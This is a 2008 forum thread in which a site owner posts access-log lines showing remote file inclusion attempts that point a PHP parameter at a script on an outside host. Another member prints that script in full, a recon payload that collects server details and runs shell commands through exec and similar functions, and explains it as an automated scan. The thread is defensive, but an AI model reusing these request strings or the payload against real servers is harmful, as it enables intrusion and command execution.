1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Am i being hacked and what are they doing?

Discussion in 'BlackHat Lounge' started by chucklechuck, Dec 25, 2008.

  1. chucklechuck

    chucklechuck Registered Member

    Joined:
    Dec 2, 2008
    Messages:
    93
    Likes Received:
    52
    Not being too up on hacking i don't really know what this all means but doesn't look good. Anybody have any advice?

    Thanks in advance
    Code:
     72.55.176.232 more info
    ,
    
    vm-weblinux01.axialdev.net
    Mozilla/3.0 (OS/2; U)
    December 25, 2008 12:40:46
    	
    /golf-gift/golf-tickets//functions/anti-hack.php?ezt_root_path=http://vennom.t35.com/idfell.txt???
    December 25, 2008 12:40:46
    	
    /golf-gift//functions/anti-hack.php?ezt_root_path=http://vennom.t35.com/idfell.txt???
    December 25, 2008 12:40:46
    	
    //functions/anti-hack.php?ezt_root_path=http://vennom.t35.com/idfell.txt???
    December 25, 2008 12:40:57
    	
    /golf-gift/golf-tickets//ezt/common.php?ezt_root_path=http://vennom.t35.com/idfell.txt???
    December 25, 2008 12:40:57
    	
    //ezt/common.php?ezt_root_path=http://vennom.t35.com/idfell.txt???
    December 25, 2008 12:40:57
    	
    /golf-gift//ezt/common.php?ezt_root_path=http://vennom.t35.com/idfell.txt???
     
  2. fatboy

    fatboy Elite Member

    Joined:
    Aug 13, 2008
    Messages:
    1,618
    Likes Received:
    3,227
    Occupation:
    Retired
    Location:
    Old Peoples Home
    At a guess thats a script running against your server hoping that you have one of the applications its testing for installed.

    It appears that they are trying to download idefell.txt down onto your box. The file contains:

    Code:
    <?php
    //FeeLCoMz Response
    $pwd1 =	@getcwd();
    $un = @php_uname();
    $os = @PHP_OS;
    $id1 = ex("id");if (empty($id1)) {$id1 = @get_current_user();}
    $sof1 =	@getenv("SERVER_SOFTWARE");
    $php1 =	@phpversion();
    $name1 = $_SERVER['SERVER_NAME'];
    $ip1 = @gethostbyname($SERVER_ADDR);
    $free1=	@diskfreespace($pwd1);
    $all1= disk_total_space($pwd1);
    $used =	ConvertBytes($all1-$free1);
    $free =	ConvertBytes(@diskfreespace($pwd1));if (!$free) {$free = 0;}
    $all = ConvertBytes(@disk_total_space($pwd1));if (!$all) {$all = 0;}
    if (@is_writable($pwd1)) {$perm = "[W]";} else {$perm = "[R]";}
    if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {$sf = "ON";} else {$sf = "OFF";}
    
    echo "FeeLCoMz".$sf."<br>";
    echo "uname -a:	$un<br>";
    echo "os: $os<br>";
    echo "id: $id1<br>";
    echo "pwd: $pwd1<br>";
    echo "php: $php1<br>";
    echo "software:	$sof1<br>";
    echo "srvip: $ip1<br>";
    echo "srvname: $name1<br>";
    echo "free: $free<br>";
    echo "used: $used<br>";
    echo "total: $all $perm<br>";
    
    function ConvertBytes($number) {
      $len = strlen($number);
      if($len < 4) { return sprintf("%d b", $number); }
      if($len >= 4 && $len <=6) { return sprintf("%0.2f Kb", $number/1024); }
      if($len >= 7 && $len <=9) { return sprintf("%0.2f Mb", $number/1024/1024); }
      return sprintf("%0.2f Gb", $number/1024/1024/1024);
    }
    
    function ex($cfe) {
      $res = '';
      if (!empty($cfe)) {
        if(function_exists('exec')) {
          @exec($cfe,$res);
          $res = join("n",$res);
        } elseif(function_exists('shell_exec')) {
          $res = @shell_exec($cfe);
        } elseif(function_exists('system')) {
          @ob_start();
          @system($cfe);
          $res = @ob_get_contents();
          @ob_end_clean();
        } elseif(function_exists('passthru')) {
          @ob_start();
          @passthru($cfe);
          $res = @ob_get_contents();
          @ob_end_clean();
        } elseif(@is_resource($f = @popen($cfe,"r"))) {
          $res = "";
          while(!@feof($f)) { $res .= @fread($f,1024); }
          @pclose($f);
        } else { $res = "NULL"; }
      }
      return $res;
    }
    
    exit;
    
    ?>
    
    which is getting various things suck as PHP version, whether safe mode is on and whether the script can run system commands (such as exec / passthru).

    It may be a script to check to see what else the hacker could run if that script successfully got on your box.

    May be worth scanning your server to see if that file is on there anywhere.
     
    • Thanks Thanks x 1
  3. chucklechuck

    chucklechuck Registered Member

    Joined:
    Dec 2, 2008
    Messages:
    93
    Likes Received:
    52
    thanks for response. Checked files stored and can't see anything new but this is hosted on a shared hostgator server. Will keep my eye out anyway.
     
  4. fatboy

    fatboy Elite Member

    Joined:
    Aug 13, 2008
    Messages:
    1,618
    Likes Received:
    3,227
    Occupation:
    Retired
    Location:
    Old Peoples Home
    Its probably just an automated scan that is going across the IP range you are on :)
    Ley Hostgator worry about the backend ;)